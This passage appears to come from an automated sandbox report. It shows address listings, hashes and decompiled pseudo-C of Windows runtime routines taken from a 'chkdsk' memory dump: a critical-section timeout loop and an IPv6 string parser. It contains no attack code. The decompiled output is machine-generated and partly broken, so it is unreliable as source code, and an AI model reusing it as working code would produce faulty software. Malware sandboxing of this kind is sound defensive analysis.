                                          0x023f22f4
                                          0x023f22f9
                                          0x023f22fa
                                          0x023f2305
                                          0x023f2314
                                          0x023f2319
                                          0x023f231a
                                          0x023f231d
                                          0x023f2320
                                          0x023f2323
                                          0x023f2323
                                          0x023f2328
                                          0x023f232d
                                          0x023f232f
                                          0x023f2331
                                          0x023f2336
                                          0x023f2336
                                          0x023f233b
                                          0x023f233d
                                          0x023f2350
                                          0x023f2351
                                          0x023f2356
                                          0x023f2359
                                          0x023f2359
                                          0x023f235b
                                          0x023f235d
                                          0x023b5367
                                          0x023b536b
                                          0x023b5372
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023f2363
                                          0x023f2363
                                          0x023f2369
                                          0x023f236a
                                          0x023f236c
                                          0x023f2371
                                          0x023f2373
                                          0x00000000
                                          0x023f2379
                                          0x023f2379
                                          0x023f237a
                                          0x023f237f
                                          0x023f237f
                                          0x023f2385
                                          0x023f2386
                                          0x023f2389
                                          0x023f238e
                                          0x023f2390
                                          0x023b5378
                                          0x023b537c
                                          0x023f2396
                                          0x023f2396
                                          0x023f2397
                                          0x023f239c
                                          0x023f23a2
                                          0x023f23a3
                                          0x023f23a6
                                          0x023f23ab
                                          0x023f23ad
                                          0x00000000
                                          0x023f23b3
                                          0x023f23b3
                                          0x023f23b4
                                          0x023f23b9
                                          0x023f23ba
                                          0x023f23ba
                                          0x023f23bc
                                          0x023f23bf
                                          0x00000000
                                          0x00000000
                                          0x023e9153
                                          0x023e9158
                                          0x023e915a
                                          0x023e915e
                                          0x023e9160
                                          0x00000000
                                          0x023e9166
                                          0x023e9166
                                          0x023e9171
                                          0x023e9176
                                          0x023e9176
                                          0x00000000
                                          0x023e9160
                                          0x023f23c6
                                          0x023f23cb
                                          0x023f23ce
                                          0x023f23d7
                                          0x023f23d7
                                          0x023f23ad
                                          0x023f2390
                                          0x023f2373
                                          0x023f233f
                                          0x023f233f
                                          0x00000000
                                          0x023f233f
                                          0x023f2291
                                          0x023f2291
                                          0x023f2293
                                          0x023f2295
                                          0x023f229a
                                          0x023f22a1
                                          0x023f22a3
                                          0x023f22a7
                                          0x023f22a9
                                          0x00000000
                                          0x00000000
                                          0x023f22ab
                                          0x023f22ad
                                          0x023f22af
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023f22af
                                          0x023f22b1
                                          0x023f22b4
                                          0x023f22b4
                                          0x023f22b6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x023f22b6
                                          0x023f228f
                                          0x00000000
                                          0x023f226d
                                          0x023b53cb
                                          0x023b53ce
                                          0x023b53d0
                                          0x023b53d4
                                          0x023b53d6
                                          0x00000000
                                          0x023b53d8
                                          0x023b53e3
                                          0x023b53ea
                                          0x023b53ea
                                          0x023b53d6
                                          0x00000000

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023F22F4
                                          Strings
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023F22FC
                                          • RTL: Re-Waiting, xrefs: 023F2328
                                          • RTL: Resource at %p, xrefs: 023F230B
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-871070163
                                          • Opcode ID: 53fea3e0dab07b3629bd6896e3d35d0717a1803bf8b9042eb5f49b3489cb4d42
                                          • Instruction ID: 7b6b4eab337d33e0e2737e9a7538ceb9d7b0a8f697cc8a08a03c4a915c61e361
                                          • Opcode Fuzzy Hash: 53fea3e0dab07b3629bd6896e3d35d0717a1803bf8b9042eb5f49b3489cb4d42
                                          • Instruction Fuzzy Hash: 0D51E671601715ABEB619F68DC80FA773A9AF44324F104259FE09DB780E771E8468B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 023BEC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 51%
                                          			E023BEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E023ADA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x247793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E023916C0(_t39);
				} else {
					_t40 = E0238F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E023D3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E023901A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x247793c; // 0x0
								_push(_t85);
								_t44 = E02391F28(_t71);
							} else {
								_t44 = E0238F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E023D3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02412306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E023BEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E023D4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E023E3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E023E3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x24720c0;
								if(_t85 != 0x24720c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0241217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E023E3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                          0x023bec56
                                          0x023bec56
                                          0x023bec56
                                          0x023bec5c
                                          0x023bec64
                                          0x023f23e6
                                          0x023f23eb
                                          0x023f23eb
                                          0x023bec6a
                                          0x023bec6c
                                          0x023bec6f
                                          0x023f23f3
                                          0x023f23f8
                                          0x023f23fa
                                          0x023f23fc
                                          0x023bec75
                                          0x023bec76
                                          0x023bec76
                                          0x023bec7b
                                          0x023bec7c
                                          0x023bec7e
                                          0x023f2406
                                          0x023f2407
                                          0x023f240c
                                          0x023f240d
                                          0x023f240d
                                          0x023f240d
                                          0x023f2414
                                          0x023f2417
                                          0x023f241e
                                          0x023f2435
                                          0x023f2438
                                          0x023f243c
                                          0x023f243f
                                          0x023f2442
                                          0x023f2443
                                          0x023f2446
                                          0x023f2449
                                          0x023f2453
                                          0x023f2455
                                          0x023f245b
                                          0x023f245b
                                          0x023beb99
                                          0x023beb99
                                          0x023beb9c
                                          0x023beb9d
                                          0x023beb9f
                                          0x023beba2
                                          0x023f2465
                                          0x023f246b
                                          0x023f246d
                                          0x023beba8
                                          0x023beba9
                                          0x023beba9
                                          0x023bebae
                                          0x023bebb3
                                          0x023bebb9
                                          0x023bebbb
                                          0x023f2513
                                          0x023f2514
                                          0x023f2519
                                          0x023f251b
                                          0x023bec2a
                                          0x023bec2d
                                          0x023bec33
                                          0x023bec36
                                          0x023bec3a
                                          0x023bec3e
                                          0x023bec40
                                          0x023bec47
                                          0x023bec47
                                          0x023bec40
                                          0x023922c6
                                          0x023bebc1
                                          0x023bebc1
                                          0x023bebc5
                                          0x023bec9a
                                          0x023bec9a
                                          0x023bebd6
                                          0x023bebd6
                                          0x00000000
                                          0x023bebbb
                                          0x023f2477
                                          0x023f247c
                                          0x023f2486
                                          0x023f248b
                                          0x023f2496
                                          0x023f249b
                                          0x023f249d
                                          0x023f24a0
                                          0x023f24a3
                                          0x023f24aa
                                          0x023f24aa
                                          0x023f24a5
                                          0x023f24a5
                                          0x023f24a5
                                          0x023f24ac
                                          0x023f24af
                                          0x023f24b0
                                          0x023f24b3
                                          0x023f24b9
                                          0x023f24ba
                                          0x023f24bb
                                          0x023f24c6
                                          0x023f24cb
                                          0x023f24cd
                                          0x023f24d0
                                          0x023f24d1
                                          0x023f24d4
                                          0x023f24d6
                                          0x023f24d9
                                          0x023f24d9
                                          0x023f24dc
                                          0x023f24df
                                          0x023f24e1
                                          0x023f24e7
                                          0x023f24e9
                                          0x023f24ec
                                          0x023f24ef
                                          0x023f24f2
                                          0x023f24f2
                                          0x023f24ef
                                          0x023f24e7
                                          0x023f24fa
                                          0x023f24ff
                                          0x023f2501
                                          0x023f2503
                                          0x023f2506
                                          0x023f250b
                                          0x023beb8c
                                          0x023beb93
                                          0x00000000
                                          0x00000000
                                          0x023beb93
                                          0x00000000
                                          0x023beb99
                                          0x023bec85
                                          0x023bec85
                                          0x023bec85
                                          0x00000000

                                          Strings
                                          • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 023F248D
                                          • RTL: Re-Waiting, xrefs: 023F24FA
                                          • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 023F24BD
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                          • API String ID: 0-3177188983
                                          • Opcode ID: 7816b595808c3370cad322c74d866344e8a92094b6d4ff897033e60573083bd5
                                          • Instruction ID: 6391b6fac6ca7440c9b9051c49f3d43f0af403f910edc8336871d1992c8f960b
                                          • Opcode Fuzzy Hash: 7816b595808c3370cad322c74d866344e8a92094b6d4ff897033e60573083bd5
                                          • Instruction Fuzzy Hash: 8041C2B0600204ABDB20DF68DC85FAB77A9EF45320F108605FA699B6D1D774E941CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 023CFCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E023CFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E023CEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E023CEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E023C685D(_t167, 4) == 0) {
								if(E023C685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E023C685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E023C685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E023A8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0239DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E023CEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E023CEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                          0x023cfcd1
                                          0x023cfcd6
                                          0x023cfcd9
                                          0x023cfcdc
                                          0x023cfcdf
                                          0x023cfce2
                                          0x023cfce5
                                          0x023cfce8
                                          0x023cfceb
                                          0x023cfced
                                          0x023cfced
                                          0x023cfcf3
                                          0x00000000
                                          0x00000000
                                          0x023cfcfc
                                          0x023cfcfe
                                          0x023cfdc1
                                          0x023fecbd
                                          0x00000000
                                          0x023feccc
                                          0x023feccc
                                          0x023fecd2
                                          0x00000000
                                          0x00000000
                                          0x023fecdf
                                          0x023fece0
                                          0x023fece4
                                          0x023feceb
                                          0x023fecee
                                          0x023feca8
                                          0x023feca8
                                          0x023fecaa
                                          0x023cfd76
                                          0x023cfd79
                                          0x023cfdb4
                                          0x023cfdb5
                                          0x023cfdb6
                                          0x00000000
                                          0x023cfdb6
                                          0x023cfd7e
                                          0x023fecfc
                                          0x023cfe2f
                                          0x00000000
                                          0x023cfe2f
                                          0x023fed08
                                          0x023fed0f
                                          0x023fed17
                                          0x023fed1b
                                          0x00000000
                                          0x023fed1b
                                          0x023cfd88
                                          0x00000000
                                          0x00000000
                                          0x023cfd94
                                          0x023cfd99
                                          0x023cfda1
                                          0x00000000
                                          0x00000000
                                          0x023cfdb0
                                          0x00000000
                                          0x023cfdb0
                                          0x023fecbd
                                          0x023cfdc7
                                          0x023cfdcb
                                          0x00000000
                                          0x023cfdd7
                                          0x023cfde3
                                          0x023cfe06
                                          0x023e1fe7
                                          0x00000000
                                          0x00000000
                                          0x023e1fef
                                          0x023e1ff0
                                          0x023e1ff4
                                          0x023e1ff7
                                          0x023e1ffa
                                          0x023e1ffd
                                          0x023e2000
                                          0x00000000
                                          0x00000000
                                          0x023fecf1
                                          0x00000000
                                          0x023fecf1
                                          0x00000000
                                          0x023cfe06
                                          0x023cfde8
                                          0x023cfdec
                                          0x023cfdef
                                          0x023cfdf2
                                          0x00000000
                                          0x023cfdf2
                                          0x023cfdcb
                                          0x023cfd04
                                          0x023cfd05
                                          0x023fec67
                                          0x00000000
                                          0x00000000
                                          0x023fec6f
                                          0x00000000
                                          0x023fec6f
                                          0x023cfd13
                                          0x023cfd3c
                                          0x023cfd40
                                          0x023fec75
                                          0x023fec7a
                                          0x00000000
                                          0x023fec8a
                                          0x023fec8a
                                          0x023fec90
                                          0x023fecb2
                                          0x023cfd73
                                          0x023cfd73
                                          0x00000000
                                          0x023cfd73
                                          0x023fec95
                                          0x00000000
                                          0x00000000
                                          0x023feca1
                                          0x023feca4
                                          0x023feca5
                                          0x00000000
                                          0x023feca5
                                          0x023fec7a
                                          0x023cfd4a
                                          0x00000000
                                          0x023cfd6e
                                          0x023cfd6e
                                          0x023cfd71
                                          0x00000000
                                          0x023cfd71
                                          0x023cfd4a
                                          0x023cfd21
                                          0x023da3a1
                                          0x00000000
                                          0x023da3a1
                                          0x023cfd36
                                          0x023e200b
                                          0x023e2012
                                          0x00000000
                                          0x00000000
                                          0x023e2018
                                          0x00000000
                                          0x023e2018
                                          0x00000000
                                          0x023cfd36
                                          0x023cfe0f
                                          0x023cfe16
                                          0x023da3ad
                                          0x00000000
                                          0x00000000
                                          0x023da3b3
                                          0x023da3b3
                                          0x023cfe1f
                                          0x023fed25
                                          0x023fed86
                                          0x00000000
                                          0x00000000
                                          0x023fed91
                                          0x023fed95
                                          0x023fed95
                                          0x023fed9a
                                          0x023fedad
                                          0x023fedb3
                                          0x023fedba
                                          0x023fedc4
                                          0x023fedc9
                                          0x00000000
                                          0x023fedcc
                                          0x023fed2a
                                          0x023fed55
                                          0x00000000
                                          0x00000000
                                          0x023fed61
                                          0x023fed66
                                          0x023fed6e
                                          0x00000000
                                          0x00000000
                                          0x023fed7d
                                          0x00000000
                                          0x023fed7d
                                          0x023fed30
                                          0x00000000
                                          0x00000000
                                          0x023fed3c
                                          0x023fed43
                                          0x023fed4b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: __fassign
                                          • String ID:
                                          • API String ID: 3965848254-0
                                          • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                          • Instruction ID: a67952ede27e6ca1850c6af3e676258e954f18e73ab40bb269cdcae2263634d8
                                          • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                          • Instruction Fuzzy Hash: 51918C71D0020AEFDF24DFA8C8457AEB7B6EB45709F30846FD405A6692E7309E41CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%